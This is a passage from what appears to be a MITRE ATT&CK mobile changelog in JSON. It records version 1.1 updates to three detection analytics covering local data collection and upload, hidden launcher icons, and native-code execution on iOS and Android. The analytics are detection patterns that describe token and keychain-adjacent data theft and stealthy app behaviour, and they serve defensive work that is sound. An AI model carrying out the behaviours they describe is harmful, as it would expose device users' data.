class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">epeated&nbsp;enumeration/read&nbsp;activity&nbsp;against&nbsp;local&nbsp;paths&nbsp;associ</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ated&nbsp;with&nbsp;media,&nbsp;tokens,&nbsp;caches,&nbsp;or&nbsp;exported&nbsp;application&nbsp;dat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">a.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--b7b70725-f1d8-4fad-8fc4-fc1b9cbf77ef",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-08 20:07:42.093000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0713#AN1841",
                            "external_id": "AN1841"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1841",
                    "description": "The defender correlates supervised-device app posture and lifecycle context with repeated local file or local-database access effects, especially when a managed app reads browser, messaging, keychain-adjacent, or application-container data outside its expected role and then stages or uploads the result. Because direct low-level local system access visibility is weaker on iOS, the primary analytic is effect-based: managed app identity, file/database access where visible to the mobile sensor, background execution context, and near-term outbound communication.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Supervised managed app without expected local export, sync, or forensic role accesses or stages local records inconsistent with policy baseline"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application reads multiple local container files, browser-history artifacts, messaging artifacts, or local records in rapid sequence during the collection phase"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between managed app posture, local access activity, optional staging, and upload"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Managed apps expected to access local records such as enterprise sync, backup, or approved investigation tools"
                        },
                        {
                            "field": "AllowedContainerPatterns",
                            "description": "Expected app-container or local artifact locations for legitimate workflows"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether local record access should happen only during active user interaction"
                        },
                        {
                            "field": "BurstReadThreshold",
                            "description": "Minimum number of local file or record reads in a short interval required for alerting"
                        },
                        {
                            "field": "SensitiveArtifactPatterns",
                            "description": "Environment-specific list of high-value browser, messaging, token, or local record artifacts"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound volume consistent with recent local data collection"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Supervised managed app without expected local export, sync, or forensic role accesses or stages local records inconsistent with policy baseline\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application reads multiple local container files, browser-history artifacts, messaging artifacts, or local records in rapid sequence during the collection phase\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between managed app posture, local access activity, optional staging, and upload\"}, {\"field\": \"AllowedAppList\", \"description\": \"Managed apps expected to access local records such as enterprise sync, backup, or approved investigation tools\"}, {\"field\": \"AllowedContainerPatterns\", \"description\": \"Expected app-container or local artifact locations for legitimate workflows\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether local record access should happen only during active user interaction\"}, {\"field\": \"BurstReadThreshold\", \"description\": \"Minimum number of local file or record reads in a short interval required for alerting\"}, {\"field\": \"SensitiveArtifactPatterns\", \"description\": \"Environment-specific list of high-value browser, messaging, token, or local record artifacts\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound volume consistent with recent local data collection\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-08 20:07:42.093000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates supervised-device app posture and lifecycle context with repeated local file or local-database access effects, especially when a managed app reads browser, messaging, keychain-adjacent, or application-container data outside its expected role and then stages or uploads the result. Because direct low-level local system access visibility is weaker on iOS, the primary analytic is effect-based: managed app identity, file/database access where visible to the mobile sensor, background execution context, and near-term outbound communication.\", \"old_value\": \"Accessing data from the local system can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to86__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to86__0\"><a href=\"#difflib_chg_to86__top\">t</a></td><td class=\"diff_header\" id=\"from86_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Accessing&nbsp;data&nbsp;from&nbsp;the&nbsp;local&nbsp;system&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;det</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to86__top\">t</a></td><td class=\"diff_header\" id=\"to86_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;supervised-device&nbsp;app&nbsp;posture&nbsp;and&nbsp;li</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ect,&nbsp;and&nbsp;therefore&nbsp;enterprises&nbsp;may&nbsp;be&nbsp;better&nbsp;served&nbsp;focusing</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">fecycle&nbsp;context&nbsp;with&nbsp;repeated&nbsp;local&nbsp;file&nbsp;or&nbsp;local-database&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;on&nbsp;detection&nbsp;at&nbsp;other&nbsp;stages&nbsp;of&nbsp;adversarial&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ccess&nbsp;effects,&nbsp;especially&nbsp;when&nbsp;a&nbsp;managed&nbsp;app&nbsp;reads&nbsp;browser,&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">messaging,&nbsp;keychain-adjacent,&nbsp;or&nbsp;application-container&nbsp;data&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">outside&nbsp;its&nbsp;expected&nbsp;role&nbsp;and&nbsp;then&nbsp;stages&nbsp;or&nbsp;uploads&nbsp;the&nbsp;res</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ult.&nbsp;Because&nbsp;direct&nbsp;low-level&nbsp;local&nbsp;system&nbsp;access&nbsp;visibility</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;is&nbsp;weaker&nbsp;on&nbsp;iOS,&nbsp;the&nbsp;primary&nbsp;analytic&nbsp;is&nbsp;effect-based:&nbsp;man</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">aged&nbsp;app&nbsp;identity,&nbsp;file/database&nbsp;access&nbsp;where&nbsp;visible&nbsp;to&nbsp;the</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;mobile&nbsp;sensor,&nbsp;background&nbsp;execution&nbsp;context,&nbsp;and&nbsp;near-term&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">outbound&nbsp;communication.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--944c3eaa-2809-4db3-ac7c-d1868e205793",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:30:29.495000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0714#AN1842",
                            "external_id": "AN1842"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1842",
                    "description": "Correlates (1) suppression or disablement of launcher-visible application components or effective reduction of user-facing launcher presence, (2) persistence of installed application state after icon suppression, and (3) continued runtime activity such as background execution, framework use, sensor access, or network communication after the icon becomes unavailable or is replaced by reduced-discoverability launcher behavior. The defender observes a causal chain where an app removes or reduces its launcher visibility while remaining operational and continuing meaningful activity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "installed application remains present while launcher-visible activity or component discoverability changes to hidden, disabled, or synthesized-settings-entry state prior to later runtime activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between icon suppression and later runtime activity"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Baseline of legitimate apps permitted to reduce launcher visibility, such as managed agents, work-profile utilities, or system applications"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether post-suppression behavior is only suspicious when no recent foreground interaction is present"
                        },
                        {
                            "field": "SuppressionMode",
                            "description": "Environment-specific handling of hidden, disabled, or synthesized launcher behavior depending on Android version and management posture"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound traffic volume used to distinguish meaningful hidden operation from benign background maintenance"
                        },
                        {
                            "field": "SensorAfterSuppressionThreshold",
                            "description": "Threshold for sensor access frequency after launcher visibility is reduced"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between icon suppression and later runtime activity\"}, {\"field\": \"AllowedAppList\", \"description\": \"Baseline of legitimate apps permitted to reduce launcher visibility, such as managed agents, work-profile utilities, or system applications\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether post-suppression behavior is only suspicious when no recent foreground interaction is present\"}, {\"field\": \"SuppressionMode\", \"description\": \"Environment-specific handling of hidden, disabled, or synthesized launcher behavior depending on Android version and management posture\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound traffic volume used to distinguish meaningful hidden operation from benign background maintenance\"}, {\"field\": \"SensorAfterSuppressionThreshold\", \"description\": \"Threshold for sensor access frequency after launcher visibility is reduced\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:30:29.495000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) suppression or disablement of launcher-visible application components or effective reduction of user-facing launcher presence, (2) persistence of installed application state after icon suppression, and (3) continued runtime activity such as background execution, framework use, sensor access, or network communication after the icon becomes unavailable or is replaced by reduced-discoverability launcher behavior. The defender observes a causal chain where an app removes or reduces its launcher visibility while remaining operational and continuing meaningful activity.\", \"old_value\": \"The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings. If the user is redirected to the device settings when tapping an application\\u2019s icon, they should inspect the application to ensure it is genuine.\\nApplication vetting services could potentially detect the usage of APIs intended for suppressing the application\\u2019s icon.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings. If the user is redirected to the device settings when tapping an application\\u2019s icon, they should inspect the application to ensure it is genuine.\\n-Application vetting services could potentially detect the usage of APIs intended for suppressing the application\\u2019s icon.\\n+Correlates (1) suppression or disablement of launcher-visible application components or effective reduction of user-facing launcher presence, (2) persistence of installed application state after icon suppression, and (3) continued runtime activity such as background execution, framework use, sensor access, or network communication after the icon becomes unavailable or is replaced by reduced-discoverability launcher behavior. The defender observes a causal chain where an app removes or reduces its launcher visibility while remaining operational and continuing meaningful activity.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"installed application remains present while launcher-visible activity or component discoverability changes to hidden, disabled, or synthesized-settings-entry state prior to later runtime activity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to162__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to162__0\"><a href=\"#difflib_chg_to162__top\">t</a></td><td class=\"diff_header\" id=\"from162_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;examine&nbsp;the&nbsp;list&nbsp;of&nbsp;all&nbsp;installed&nbsp;applications,</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to162__top\">t</a></td><td class=\"diff_header\" id=\"to162_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;suppression&nbsp;or&nbsp;disablement&nbsp;of&nbsp;launcher-visibl</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;including&nbsp;those&nbsp;with&nbsp;a&nbsp;suppressed&nbsp;icon,&nbsp;in&nbsp;the&nbsp;device&nbsp;setti</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;application&nbsp;components&nbsp;or&nbsp;effective&nbsp;reduction&nbsp;of&nbsp;user-faci</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ngs.&nbsp;If&nbsp;the&nbsp;user&nbsp;is&nbsp;redirected&nbsp;to&nbsp;the&nbsp;device&nbsp;settings&nbsp;when&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ng&nbsp;launcher&nbsp;presence,&nbsp;(2)&nbsp;persistence&nbsp;of&nbsp;installed&nbsp;applicati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">apping&nbsp;an&nbsp;application\u2019s&nbsp;icon,&nbsp;they&nbsp;should&nbsp;inspect&nbsp;the&nbsp;applic</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;state&nbsp;after&nbsp;icon&nbsp;suppression,&nbsp;and&nbsp;(3)&nbsp;continued&nbsp;runtime&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ation&nbsp;to&nbsp;ensure&nbsp;it&nbsp;is&nbsp;genuine.&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ctivity&nbsp;such&nbsp;as&nbsp;background&nbsp;execution,&nbsp;framework&nbsp;use,&nbsp;sensor&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">could&nbsp;potentially&nbsp;detect&nbsp;the&nbsp;usage&nbsp;of&nbsp;APIs&nbsp;intended&nbsp;for&nbsp;supp</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">access,&nbsp;or&nbsp;network&nbsp;communication&nbsp;after&nbsp;the&nbsp;icon&nbsp;becomes&nbsp;unav</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ressing&nbsp;the&nbsp;application\u2019s&nbsp;icon.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ailable&nbsp;or&nbsp;is&nbsp;replaced&nbsp;by&nbsp;reduced-discoverability&nbsp;launcher&nbsp;b</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ehavior.&nbsp;The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;an&nbsp;app&nbsp;r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">emoves&nbsp;or&nbsp;reduces&nbsp;its&nbsp;launcher&nbsp;visibility&nbsp;while&nbsp;remaining&nbsp;op</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">erational&nbsp;and&nbsp;continuing&nbsp;meaningful&nbsp;activity.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--4ec34db8-7214-4059-925e-bdcd58bca391",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 16:13:11.156000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0717#AN1847",
                            "external_id": "AN1847"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1847",
                    "description": "The defender correlates application loading or invoking native libraries through JNI or NDK-backed execution paths with subsequent lower-level activity such as native thread creation, sensor access, file operations, or outbound network communication that is inconsistent with the app's declared role or recent user interaction. The analytic prioritizes defender-observable control-plane effects: native library load or JNI bridge use, transition into native execution context, and immediate post-load behavior occurring from background state, locked-device state, or non-baselined app categories.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Native library load or JNI-backed execution occurs while app_state=background or device_locked=true or recent_user_interaction=false during the execution phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Managed application without approved native-code role or expected high-performance/native dependency exhibits native execution behavior inconsistent with enterprise policy baseline"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between native library load, JNI/native execution, and follow-on behavior"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to use native code, such as games, media, enterprise VPN, security tools, or performance-intensive apps"
                        },
                        {
                            "field": "AllowedLibraryPatterns",
                            "description": "Expected native library names, paths, signing attributes, or packaging patterns for approved applications"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether native execution should only occur during active user-driven workflows for a given app role"
                        },
                        {
                            "field": "LibraryPathPatterns",
                            "description": "Environment-specific list of suspicious temporary, extracted, or dynamically staged native library locations"
                        },
                        {
                            "field": "PostLoadBehaviorThreshold",
                            "description": "Minimum number or severity of suspicious actions after native load required to elevate confidence"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound volume after native execution to treat network activity as meaningful follow-on behavior"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Native library load or JNI-backed execution occurs while app_state=background or device_locked=true or recent_user_interaction=false during the execution phase\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Managed application without approved native-code role or expected high-performance/native dependency exhibits native execution behavior inconsistent with enterprise policy baseline\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between native library load, JNI/native execution, and follow-on behavior\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to use native code, such as games, media, enterprise VPN, security tools, or performance-intensive apps\"}, {\"field\": \"AllowedLibraryPatterns\", \"description\": \"Expected native library names, paths, signing attributes, or packaging patterns for approved applications\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether native execution should only occur during active user-driven workflows for a given app role\"}, {\"field\": \"LibraryPathPatterns\", \"description\": \"Environment-specific list of suspicious temporary, extracted, or dynamically staged native library locations\"}, {\"field\": \"PostLoadBehaviorThreshold\", \"description\": \"Minimum number or severity of suspicious actions after native load required to elevate confidence\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound volume after native execution to treat network activity as meaningful follow-on behavior\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 16:13:11.156000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates application loading or invoking native libraries through JNI or NDK-backed execution paths with subsequent lower-level activity such as native thread creation, sensor access, file operations, or outbound network communication that is inconsistent with the app's declared role or recent user interaction. The analytic prioritizes defender-observable control-plane effects: native library load or JNI bridge use, transition into native execution context, and immediate post-load behavior occurring from background state, locked-device state, or non-baselined app categories.\", \"old_value\": \"This is abuse of standard OS-level APIs and are therefore typically undetectable to the end user.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
